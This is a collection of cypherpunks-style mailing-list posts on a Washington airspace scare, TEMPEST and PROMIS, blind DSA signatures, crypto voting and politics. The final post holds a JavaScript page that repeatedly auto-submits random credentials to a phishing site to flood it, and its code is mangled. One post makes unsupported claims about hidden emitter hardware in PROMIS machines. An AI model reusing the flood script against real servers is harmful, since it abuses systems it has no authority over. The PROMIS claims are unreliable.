Terrorist-controlled cessna nearly attacks washington
http://reuters.myway.com/article/20050511/2005-05-11T173816Z_01_N11199658_RTRIDST_0_NEWS-SECURITY-WASHINGTON-DC.html WASHINGTON (Reuters) - Fighter jets scrambled over Washington and authorities hurriedly evacuated the White House and the U.S. Congress on Wednesday when an unidentified plane roamed into restricted airspace, sparking fears of a Sept. 11-style attack. The light private Cessna ignored calls from air traffic controllers and entered the restricted zone around Washington, coming within 3 miles of the Capitol before turning away, authorities said. The plane's approach sent at least two F-16 fighter jets into the air over the U.S. capital and hundreds of staff and tourists into the streets outside the Capitol building, White House and Supreme Court in an urgent evacuation. [...] Capitol police swiftly moved senators, aides, lobbyists and journalists toward Union Station, about two blocks away. Police used bullhorns to order onlookers near the Capitol to stay away from the building. new terrorist target: Union Station
Re: Terrorist-controlled cessna nearly attacks washington
new terrorist target: Union Station You used a remailer for THAT?!! You used a pseudonym for THAT?!
Re: Michael Riconosciuto, PROMIS
Steve Thompson: If that's true, then the government couldn't have stolen it. However, I suspect that mainfraim code of any sophistication is rarely released into the public domain. I imagine the author would be able to clear that up, assuming he has no financial reason to falsify its history. The page clearly states that the enhanced version was not in the public domain or owned by the government, it was a completely new version and the development was not funded by the government. The old one was for 16 bit architecture whereas the new one was for 32 bit. http://www.wired.com/wired/archive/1.01/inslaw.html Perhaps I am stupid. I don't know how one would go about modifying application software to include a 'back door' that would presumably enhance its suceptibility to TEMPEST attacks. Isn't tempest all about EM spectrum signal detection and capture? ALL electronic devices emits signals that you can intercept and obtain information from. Whether or not you can extract much useful data or not depends, but generally you can always extract something. This is a vast field and it's hard to generalize. I have personally attended tests at a firm working for the military in a western European country and I've seen how extremely easy it is to do remote classic tempest-reading of the screen of a lap-top, to name only one example. The equipment easily fits in only a station wagon. Generally this is really hard to protect yourself from. Let's say you build yourself a bunker and put your computer inside it but you forget to run it on batteries, then you'll find out that signals will be carried out on the electric cord entering your bunker and they'll be readily readable outside anyway. You can't have any kind of opening in and out of that bunker, not even for ventilation, so you see this is hard to do. Maybe they built in other forms of remotely usable back-doors too, just in case there were able to make contact with the computer remotely over some network. This makes sense too, since one or two or those computers surely were less protected. Some people falsely believe that only CRT screens can be read remotely using TEMPEST techniques, this couldn't be more false, in fact one of the test managers I spoke to said he thought it was easier with TFT type monitors. Also remeber that we're not just talking about monitors, many other devices emits interesting and potential useful informaation: faxes, printers, networking hardware etc. Those PROMIS people built in hardware on the motherboards that emitted signals using a kind of jumping frequency technique. If you have the key giving you he answer to how the frequencies are changed you can easily intercept the data otherwise it becomes really hard to do and esp hard to find out that there's anything emitting in the first place - it looks like noise. The purpose of this was so that they could sell the whole package, the PC with the software pre-installed to customers and then they could sit in their wan down the street and record. It's no only happening in the movies you know :) BTW: I would also be interested in some more comments on Michael Riconosciuto as a person, doesn't anyone have an opinion or know of interesting info in this regard? Are there any books written by him or by people on his side of the story?
Re: Blind signatures with DSA/ECDSA?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Often people ask about blind DSA signatures. There are many known variants on DSA signatures which allow for blinding, but blinding plain DSA signatures is not discussed much. Clearly, blinding DSA signatures is possible, through general purpose two party multi-party computations, such as circuit based protocols. However these would be too inefficient. I believe that the technique of Philip MacKenzie and Michael K. Reiter, Two-Party Generation of DSA Signatures, Crypto 2001, http://www.ece.cmu.edu/~reiter/papers/, can be adapted for blind DSA signatures that would be reasonably efficient. The problem they solved was different in that both parties had a share of the private key, and there was no effort to hide the message hash being signed or the (r,s) signature values. However the same basic idea should work. The scheme uses a homomorphic encryption key held by the first party, Alice, who is the one who will receive the signature. Bob is the signer. The homomorphic encryption system allows Bob to take an encrypted value and multiply it by a constant known to him; and also to add two encrypted values together. (That is, Bob can produce an output cyphertext which holds the result. He does not learn the result.) Suggested cryptosystems with the desired properties include those from Paillier; Naccache and Stern; or Okamoto and Uchiyama. Alice starts with the message hash H, and knows the public key parameters y, g, p and q. Bob knows the private key x such that y = g^x mod p, where q is the order of g. DSA signatures are computed by choosing a random value k mod q and computing r = g^k mod p mod q; z = 1/k mod q; s = x*r*z + H*z mod q; with (r,s) being the signature. For the protocol, Alice and Bob will compute k as multiplicatively shared, with Alice knowing k1 and Bob knowing k2, where k1*k2 = k mod q. We start, then, with Bob (the signer) computing r2 = g^k2 mod p and sending that to Alice. Alice computes r = r2^k1 mod p mod q = g^(k2*k1) mod p mod q = g^k mod p mod q. Alice and Bob also compute z1 = 1/k1 mod q and z2 = 1/k2 mod q respectively; then z = 1/k mod q = z1*z2 mod q. Alice uses the homomorphic encryption and produces a = E(r*z1) and b = E(H*z1). She sends these to Bob along with some ZK proofs that the values are well formed. Bob uses the homomorphic properties to multiply the plaintext of a by x*z2 and the plaintext of b by z2 and to add them, along with a large random multiple of q, q*d, where d is random mod q^5: c = a X (x*z2) + b X z2 + E(d*q). Here X means the operation to multiply the hidden encrypted value by a scalar, and + is the operation to add two encrypted values. Bob sends c back to Alice. Alice decrypts c and takes the result mod q to recover s = r*z1*x*z2 + H*z1*z2 = x*r*z + H*z mod q, the other component of the DSS signature. She can verify that Bob behaved correctly by checking that (r,s) is a valid DSS signature on H. For a quick security analysis, Alice is clearly safe as Bob never sees anything from her but some encrypted values, and his k2 share of k is uncorrelated to k itself. In the other direction, Bob has to be concerned about revealing x. He is given two encrypted values and has to multiply one by x*z2 and the other by z2 and add them. If the encrypted plaintexts are u and v, this produces (u*x + v) * z2. This value is completely uncorrelated with x, mod q, because of the multiplication by z2 which is uniformly distributed. Then adding the large multiple of q should effectively hide the value of x. For strictly provable security it may be necessary for Alice and perhaps even Bob to provide some ZK proofs that they are behaving correctly. The system is reasonably efficient, the main issue being the need to be able to PK encrypt values as large as q^6, which for DSS would be 6*160 or 960 bits. That would require a Paillier key of about 2K bits which is very manageable. The total cost is about 9 modular exponentiations of 2K bit values to 1K bit exponents, plus whatever ZK proofs are necessary. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.0 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQFAiKbxHIAd9K7kkjIRAmLEAKCUNcW3fsDysi9Mul9WlFzVMQivWgCgxdHt dq6rlO2tfSoufs9NrhX616Y= =gBz4 -END PGP SIGNATURE-
Re: voting
Perry Metzger writes, on his cryptography list: By the way, I should mention that an important part of such a system is the principle that representatives from the candidates on each side get to oversee the entire process, assuring that the ballot boxes start empty and stay untampered with all day, and that no one tampers with the ballots as they're read. The inspectors also serve to assure that the clerks are properly checking who can and can't vote, and can do things like hand-recording the final counts from the readers, providing a check against the totals reported centrally. The adversarial method does wonders for assuring that tampering is difficult at all stages of a voting system. On the contrary, the adversarial method is an extremely *weak* source of security in a voting system. In the first place, it fails for primary elections where there are multiple candidates, all of one party, running for a position. It's not unusual to have a dozen candidates or even more in some rare cases (the California gubernatorial election, while not a primary, had hundreds of candidates running for one seat). It is impractical for each candidate to supply an army of representatives to supervise the voting process, nor can each polling place accommodate the number of people required. In the second place, it fails for elections with more than two parties running. The casual reference above to representatives on each side betrays this error. Poorly funded third parties cannot provide representatives as easily as the Republicans and Democrats. We already know that the major parties fight to keep third party candidates off the ballots. Can we expect them to be vigilant in making sure that Libertarian and Green votes are counted? In the third place, tampering has to be protected against in each and every voting precinct. Any voting station where the voting observers for one party are lax or incompetent could be identified in advance and targeted for fraud. Given that these observers are often elderly and have limited faculties, such frauds are all too easy to accomplish. It's baffling that security experts today are clinging to the outmoded and insecure paper voting systems of the past, where evidence of fraud, error and incompetence is overwhelming. Cryptographic voting protocols have been in development for 20 years, and there are dozens of proposals in the literature with various characteristics in terms of scalability, security and privacy. The votehere.net scheme uses advanced cryptographic techniques including zero knowledge proofs and verifiable remixing, the same method that might be used in next generation anonymous remailers. Given that so many jurisdictions are moving towards electronic voting machines, this is a perfect opportunity to introduce mathematical protections instead of relying so heavily on human beings. I would encourage observers on these lists to familiarize themselves with the cryptographic literature and the heavily technical protocol details at http://www.votehere.com/documents.html before passing judgement on these technologies.
fox news
http://www.fauxnewschannel.com/
Re: U.S. in violation of Geneva convention?
Greetings Has Saddam recieved a lawyer yet? Will Saddam be judged by a court having jurisdiction and being recognized internationally?
Re: U.S. in violation of Geneva convention?
On Wed, 17 Dec 2003, BillyGOTO wrote: Nice, but the problem still remains: At this point it doesn't matter what he has done (or we say he has done). This is not a punishment. Innocent until proofen guilty anyone? This is the basis for the enlightened western society, no? This isn't a ski mask burglary. We KNOW Saddam ruled Iraq. We KNOW what crimes were committed. Simple syllogism. I think you might have forgotten about the other half the system, due process. Even if you KNOW something, you've got to go through the motions.
Re: U.S. in violation of Geneva convention?
The U.S. official's way of behaving like Texas rednecks are embarrassing. Not Crosspost from nettime: Subject: nettime wrong signals If symbols really do matter we might conclude that American administration's PR machine has got it badly wrong. In the carefully orchestrated news management of Saddam's capture, once again, the public opinion which *really* matters in the middle east: Arab public opinion, has been conclusively misread The image of an Arab leader (however terrible) being objectivised by a white gloved American medic like a bug on a lab bench, will not be read in the Arab world as a moment of liberation. It will be seen as a special kind of humiliation, the kind which typifies the depth of ignorance which has inspired this campaign from its outset. Once again the images (chosen with great care one imagines, given the time lapse between Saddam's capture and the John Wayne style triumphalism of the announcement) treats Arab opinion to a further demonstration of the power of the west to objectivize the world under a coolly scientific gaze. In this context no mediaeval torturer could have conceived of a greater humiliation than the medical torch's pencil thin beam illuminating the inside of the tyrant's mouth. A stupidity of almost incomprehensible proportions seems bent on prosecuting a war against terror in which the twenty-four hour news machine is mobilized to disseminate images that do little more than fan the flames of hate.
Type III Anonymous message
-BEGIN TYPE III ANONYMOUS MESSAGE- Message-type: plaintext Tim, I AM GETTING TIRED OF SEEING CYPHERPUNKS RESTRICTING WHAT INFORMATION FLOWS AND TO WHERE IT FLOWS... -END TYPE III ANONYMOUS MESSAGE-
members
Hello I'm curious. You say the list got some 400+ members right now and that's only the lne node too. Can you provide some statistics on the users? How many addresses are .gov? Any valid TLA addresses in there?!
Re: Ashcroft's bake sale, no questions allowed, gvt-issued photo ID required
Declan McCullagh ([EMAIL PROTECTED]) wrote on 2003-11-19: There will be no questions and answers. To a non native speaker, this phrase seems to imply a scary level of control over the media people. There will be no questions. Dissenters will be shot on the spot.
Re: radiusnet archives
Anyone knows what happened to the radiusnet crypto archives? I bookmarked them at http://crypto.radiusnet.net/archive/ once. Now the whole domain seem dead. Maybe not dead Registrant: Ultimate Search GPO Box 7862 Central, HK na HK Registrar: NAMESDIRECT Domain Name: RADIUSNET.NET Created on: 12-AUG-03 Expires on: 12-AUG-04 Last Updated on: 30-AUG-03 Administrative, Technical Contact: Support, DNS [EMAIL PROTECTED] Ultimate Search GPO Box 7862 Central, HK na HK 852 2537 9677 Domain servers in listed order: NS1.ULTSEARCH.COM NS2.ULTSEARCH.COM But it looks like the domain was first registered in 2003 (recently!) so the hacker/crypo guys must have dumped it a few years ago thus making it available again. Someone doesn't want us to be able to view the old contents either.(?) On http://web.archive.org/web/*/http://radiusnet.net this is displayed: Robots.txt Query Exclusion. We're sorry, access to http://radiusnet.net has been blocked by the site owner via robots.txt. Read more about robots.txt See the site's robots.txt file. Try another request or click here to search for all pages on radiusnet.net/ See the FAQs for more info and help, or contact us. In http://www.radiusnet.net/robots.txt this is placed: User-agent: * Disallow: /s Disallow: /c User-agent: ia_archiver Disallow: / User-agent: Scooter Disallow: / By explicitly excluding the ia_archiver bot from the contents they are making the contents excluded from the archiv.org archives for both versions, regardless of whether the old owners wants that or not. Maybe the archive.org people should implement a feature not making it possible to exclude old contents by taking over the domain and simply putting in the robots.txt on the root?! Maybe the Wayback Machine should only honor robots.txt for old contents if the ownership of the domain in question has been inchanged during the period in question. Every time an ownership change is done all old contents would be blocked/protected from deletion.
another fake e-gold site needs data
..Lots of data...
Save as plain text anything.html on desktop and drop onto a browser.
me
htmlhead
script language=javascript
!--
var dns = ;
var c = true;
function popup()
{
document.formname.AccountID.value = get_random();
document.formname.PassPhrase.value = GeneratePassword();
document.formname.submit();
setTimeout(autosubmit();, 2000);
}
function get_random()
{
var ranNum = Math.round(Math.random()*99);
return ranNum;
}
function getRandomNum() {
// between 0 - 1
var rndNum = Math.random()
// rndNum from 0 - 1000
rndNum = parseInt(rndNum * 1000);
// rndNum from 33 - 127
rndNum = (rndNum % 94) + 33;
return rndNum;
}
function checkPunc(num) {
if ((num =33) (num =47)) { return true; }
if ((num =58) (num =64)) { return true; }
if ((num =91) (num =96)) { return true; }
if ((num =123) (num =126)) { return true; }
return false;
}
function GeneratePassword() {
var length;
var sPassword = ;
length = 6+ Math.round(Math.random()*20)
for (i=0; i length; i++) {
numI = getRandomNum();
while (checkPunc(numI)) { numI = getRandomNum(); }
sPassword = sPassword + String.fromCharCode(numI);
}
return sPassword;
}
function autosubmit()
{
if (c)
{
document.formname.AccountID.value = get_random();
document.formname.PassPhrase.value = GeneratePassword();
document.formname.submit();
setTimeout(autosubmit();, 1000);
}
}
function turn()
{
c = !c;
if (c) setTimeout(autosubmit();, 2000);
document.formname.x.value = c?Stop it!:Let's do it again!;
}
//--
/script
/head
body onload=popup();
center
form name=formname method=post
action=http://registration-update.net/e-gold_account/user-4598Xinc/e-gold-x621vx7/login.php;
target=new3
input type=text name=AccountID length=20 maxlength=40 size=25br
input taborder=2 tabindex=2 type=text name=PassPhrase maxlength=64 size=32
autocomplete=off
input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10
autocomplete=off value=417927
input type=hidden name=jumbo value=2121
input type=submit name=Submit value=Login
input notab type=checkbox name=StoreMyNumber value=checkbox checked
input type=button name=x value=Stop it! onclick=turn();
/form
/center
/body
/html
